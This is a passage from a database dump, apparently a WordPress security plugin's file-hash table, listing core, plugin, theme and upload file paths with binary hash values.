\0\0\0\0\0\0\0\0\0\0','C�r�Nf}�-��⽪','��H������i���c�!��I).eh������','',0,'?'),('[�BX\n��Q����c�','wp-includes/blocks/file/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|Um��^�Ģe��H}�','z�q��\Z�7\"%+�/,@O\0� -�\ZM�H3�','',0,'?'),('[�ئ�m��Np�h','wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E:���>�b�$�����','Z��(�)վ0\Z���͂\\�܀���9<5�\0','',0,'?'),('[�f&`J����\\$k`','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies/category-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K9�hpo�(3�[','F�mK�y#���X�}`����r��g�_\r�@\\�','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('[�Մ)��ƚ2]���)E','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/InflateStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����\\*D��Ap�^','̈́��}��+X/oK�s����uUֆ��','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��t�\'����m@��','%�k2\'-n[��D�\"��jW�ً���.��!�','',0,'?'),('\\_���d3M�bs�2�!','wp-content/uploads/2019/10/plumbing3-150x150.jpg',0,'<���F�$b�eB�2�','<���F�$b�eB�2�','�ڇ:CR �\r\Z\r3V��Q�^ĜV�W�Ђ�/','',0,'?'),('\\e&$�1I�>��Q','wp-content/plugins/wordpress-seo/src/surfaces/twitter-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5o����ܑ�','Pv��п��2.����v�)�.��}X?�n','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!',' �H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\!����B3�X���N','wp-content/languages/plugins/akismet-en_GB.po',0,'4�U�Sʹ��h��om','4�U�Sʹ��h��om','��ȗ(�7��[��+\ZY!TZu[�E�Ĥ���s9','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\e����i-��-�e','wp-content/plugins/redirection/redirection-strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w-3W�(_�A��fH','�B�<�o`��A�>���2��hN�֔��\n7','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\��o�\0w�x�/�','wp-content/languages/en_GB-50278328b502f4eb3f2b8b7ab49324a1.json',0,'��g$�;aAQ��Y�d','��g$�;aAQ��Y�d','��P_A.�P� \n���a]Cб1��Dnc����','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���pj�\\�{wBz17','v���=d�QL��B\0��OBH���P\0���','',0,'?'),('\\��u�]�A%� �','wp-content/themes/twentytwenty/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZH8�����y��Sh�','!��\\`R���h/F_��ͻ���(8�Y>]','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\ֶ�S��\n��P�:�','wp-content/themes/twentynineteen/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��8v�D����','�N�1����1�swR�������������','',0,'?'),('\\ڋp�����I�T�6�','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^���/ǁ��.��','������x�9-��uNn��L���>��诜1SE','',0,'?'),('\\��Le���/�s�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/GenericResourceOwner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V����>t�������\Z','<\rQ�QV;��|JR>R<P�?�������\\8�','',0,'?'),(']�ui�S0�y�c��f','wp-content/uploads/2016/11/lost-places.jpg',0,'�p�E�S��oRUL�','�p�E�S��oRUL�','���Z*�j�!��+��b�#�{�$\0��h��J','',0,'?'),(']&��A��!�S�K>�','wp-content/themes/twentytwentyone/assets/images/Reading.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�*���|).��h','��Q�-:�ñ��1Z��ŴCxʞ�dd;Z�b�^','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗwf��$%�¬�fq ','���0ڬv��+��Jb_\'\0�!#�p六���','',0,'?'),(']9.�pe���T���','wp-content/themes/twentynineteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'&iɴ�G��x��Rl:','�JÂ���W�S��\"�V�JZɌM�ڛ�D','',0,'?'),(']<a��[4�r�g?�','wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q=��Ώ0���VجA','�FG�������~\r��Wrп�Ä�Ț�Z','',0,'?'),(']=OnN�����/���','wp-content/uploads/2019/09/water-sustainability.jpg',0,'/+[D�R�E �|��','/+[D�R�E �|��','����\0�\"fE����\n�@Aɏ��v�n�7','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']F^aT��g\rIa_��UA','wp-content/plugins/wordpress-seo/src/deprecated/admin/links/class-link-compatibility-notifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M.��Ts\r��A���','p��b�:���}�\nrW�(8A�+7�ܶ�Z���','',0,'?'),(']I�?�q� |��M','wp-content/plugins/wordpress-seo/src/config/migrations/20200616130143_ReplacePermalinkHashIndex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���-e���D�F�X','�1��&�t�ݼP��elל�����^K�','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']N<��~����S�K.','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-sk_SK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�y�(���H��D','}�|*m�� ��/�9B /�V����E9�X�','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']����ΰ��m','wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������j�^��!��','��)秐=�l2^m�\r���uV20�ژM{�','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��v��2�%���h$','9��ڏ w���z�e�u#Z<ty\Zc #\Z3','',0,'?'),(']�d��+�X�׃w�','wp-content/themes/vega/sample/images/full-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\R�+ܰ�yy�n','�����t���\r>��{=7��8C��5���','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']����c1���O����','wp-content/plugins/wordpress-seo/wp-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�ո�\n�n+��� \Z�','����e(�\\��Zy�FL�{��\'�aun^2','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5F �wYM.��\r!&�-','n>ďJ�X��������6\\CŰ���is�','',0,'?'),(']ΙaI��lʛDo�3k','wp-content/plugins/wordpress-seo/languages/yoast-components-ca.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\08�M�wHL�o','&�d.s��B?�}�>$�m�]��4�؛�z@��Y','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),(']�4d�9���C�<s�3','wp-includes/blocks/video/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Tv��H��ό�','�g���C-����-�}��� ���A�Q�','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^��=Cw4��w���J','wp-content/plugins/redirection/locale/json/redirection-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Q(��>xC1��|�','džS����#:NϤ��~��&ͬdmS�','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^tv�߲J����%','wp-content/plugins/wordpress-seo/src/conditionals/web-stories-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�)�tL�5=','��U}��o�+�SO�Y����:<�WQ2T�g\0H','',0,'?'),('^y#�hT_����\0Z/�','wp-content/uploads/2019/10/plumber.jpg',0,'9��JB�ɷ�IEX�#','9��JB�ɷ�IEX�#','��d�P�$��u�6���\Z�^u��\0N{�袏','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^���)C�`�4�z','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� *\'�\'F���','vRK��(\'�]�\"[)����H� v .,}�','',0,'?'),('^��q�n��k\\���[�~','wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|3.\'y̋��:�','����F�_o&c�\'�:M�ȹ�O�:P�ϥI','',0,'?'),('^�ZG:��}\"E��**$','wp-content/plugins/redirection/api/api-log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�T۫�ж�����','�F���<��`��D�����O��]��S��','',0,'?'),('^�5�O Z}�ciV�j�Q','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/RequiredParameterTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�-�Pm9������P',')d�ѩ�dց/ɑ�l�%��\n\\�\\n����}��','',0,'?'),('^��2�7}�����I��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь�����{�O�','vZ���d¥���bNpz04\\��\ZL��I��v�','',0,'?'),('^���c/�o\n\Z+','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/Exception/IdentityProviderException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F\Z��șˣ���Y�Tf','�\0�nA�@��@��x��G\Z��O�>8�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^ǿ��+C%K��x�','wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� ,��*]�1�n','���0CfIΰa����BqG�8��O�u>�Wþ','',0,'?'),('^Ҫ��c�+r��OC妵','wp-content/plugins/wordpress-seo/languages/wordpress-seo-en_AU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\rb�ñ��`7','F�r,r�x��~�hr�=�� �c0�I�{�%','',0,'?'),('^�FLG\'��A-�v��','wp-content/languages/en_GB-0ce75ad2f775d1cac9696967d484808c.json',0,'�v�&��HRꓱ���','�v�&��HRꓱ���','�?M՞x�q�|���``\ZP6`N�*�l���8�','',0,'?'),('^�� ���0�\\�O&','wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�r�\\�C���O��','��`Bb�.��4+qiU-yT3o��Ũ�lJ�\n��','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('^���S���/��VQ','wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ft(M�O�rEg8:','��j�?EQ8No{A��N+��\0�4�y��','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�B�b{�\r��8�','NL�q���L�h��x⺾K^�Aъ�Dy�W���','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5 ��O?','�@!�`C��*Me��z�j@ �@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_<�<�o{�~f�%��','wp-content/uploads/2016/11/kitchen-2486092_960_720-150x150.jpg',0,'�_ oE`��r��b1','�_ oE`��r��b1','�J �e�!G��JKq��9�N�^�b��_}}�','',0,'?'),('_B��\0��r�p�Iu��','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�!��Y�r8ܗt/�','=�\0t��d\n�J��e�ܐ��Z<��s�n6��t�','',0,'?'),('_H\Z��\Z\ZT�R4I��','wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l\'���/��sl>','��\\tYm\rC����g�z���a�~G>C���.','',0,'?'),('_`�̣���c�5w�H','wp-content/uploads/2019/08/young-300x200.jpg',0,'u�2�{�U�qj�@+�','u�2�{�U�qj�@+�','�\n8\'����_�bt�L&\r8���C�z�e','',0,'?'),('_d1@�_9��,���p','wp-includes/blocks/tag-cloud/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':%B��R\n6���\'J','L�Y5��{�L�Il#6M�XH�xP!\'��+�m\"��','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':G������F��9�;3','���T0�\0�:�j���Ov �8p.��~���ms�Q','',0,'?'),('_{�F�ZW�8�\"r�/�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V��ƺ\'','IT�Z���qqI�o�W��=-�tvC[','',0,'?'),('_~�[H ��y@x.+','wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��A���Sw��','h���vcK���r�!��.�+��d���+꒱�','',0,'?'),('_��c��:̩�Z��?','wp-content/plugins/wordpress-seo/css/dist/monorepo-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��5�!��ݗ��','��Gu����n��0�+�.=:D3�%\'�','',0,'?'),('_��J��?��>#F�','wp-content/plugins/wordpress-seo/js/dist/languages/ru-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EAh�A�]�F� D','� �����#�Rt\Z��К����>�����','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_�8������D���','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+vY!e�\\��9h2�','�&a�=��s��g;�T�\"���U�O_CL3k*','',0,'?'),('_�l���\\�Q�žA�','wp-content/plugins/wordpress-seo/languages/yoast-components-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\0�� ���E���n','��!�N�/��QT<�ӓ�o<�T����U��','',0,'?'),('_��m�s�*�v\'��*','wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VȝmQ��W{�','�\Z/OE,��p���8g\\���h\\\"��5','',0,'?'),('_��LY�E�7���R�=','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���Υdĕ6���','�~,1B俦���P�$�K˿gv-��\rk� ','',0,'?'),('_��3�Ә�I��m�','wp-content/plugins/wordpress-seo/languages/yoast-components.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-gk�$\\p(v���N','w[�Z��?/�^/w��i�v��4�Z�rY����','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��($c��g2��P��','�E� j\Z̅�9�,{\0�����wEk�Ճ��V�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_��<}��=��WS:�','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-updraft-pre-smush-original.jpg',0,'!F �^�]�0y���','!F �^�]�0y���','6wA��2�!�o���w��I�ζ�S��F','',0,'?'),('_� ��S\\����o>�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�O�S�M��&��','2����d�c2�v����[������\\Ebj�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�^��h2�m|FH��','����d!��\"K\Z,��h����!�^��j\n�','',0,'?'),('_��s�ƚt�i���>�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-organization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Aݘ*�(8uȪ}�','���=CM�\r�A�^~�߿�b�i��s�ph�','',0,'?'),('_��2o���U���E6','wp-includes/blocks/query-pagination-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�a�O��шȻ�','������ʶ�u@�)���mP����2�o�\r$','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`\Z�������Q&�`4�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�wQ�z3���1vl','�>\\=��so�&�������I�jK�','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L����e�\n�t�','�ǖ$��ªrO$w\0���rȕKd�71��','',0,'?'),('`0���m#�Y���U��[','wp-content/themes/vega/parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r�7E�F�R�','��ߧx���fR�<\r+zN��q�� ���u�U�','',0,'?'),('`3 ��J܈v�b{$�s','wp-content/themes/vega/sample/images/featured-image-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�u��E\'C','lH�c�\'vb��!���x���Д�h\Z�QZ}','',0,'?'),('`5�ƙy�5_P�XI�','wp-content/plugins/redirection/locale/redirection-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\n� cvh���S-�m','\\�O����%e������\'�wF��=��','',0,'?'),('`Bd3� C�j�3��n','wp-includes/blocks/verse/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\Z���J�.�c����','!�wN��.v���v�8[�DW� $�_��W55','',0,'?'),('`��o�\'�c?��/ �','wp-content/themes/twentynineteen/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�-�mם�]�','�I\Z�{��!��M}OL�bdpO���hV�Û�','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K� a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��N2E�ᆴ��pC�','wp-admin/images/privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W(*/�E�;�G{��','�;n0|:������,�2����X6V�B5y�Q�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S� �T�','',0,'?'),('`�[��$a��[�RO��','wp-content/plugins/redirection/models/importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�&ۦ�\n�\0n.[',':�k��8�*��Ϸ\0qh���2��8B�h','',0,'?'),('`�ڃ�j���e�&��','wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��=J��\0��\\�%','���Eb:�i8����Oet�\Zp��#�]%)','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`��\'?��� �ݒ$�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/FulfilledPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j)`WU�T�Rri����','����蔇k��{�l���v]�~X2���','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��(�%�kc[�Nd','#(�u0�Em�&�;�Nj�n�O��)\Z�b5�B�4','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�@�V�@��\0�*','ce�ȑOtԚB[�/)��H�@c^�7�8�ϱ�','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a\"�-\"h���`E��','wp-content/uploads/2019/08/Therapy-updraft-pre-smush-original.jpg',0,'}\0ӳι=*��q�4G','}\0ӳι=*��q�4G','�8�^�~As��=_�)�0�D��|�=W�','',0,'?'),('a!�/E~m��\0M�����','wp-content/plugins/wordpress-seo/languages/wordpress-seo-c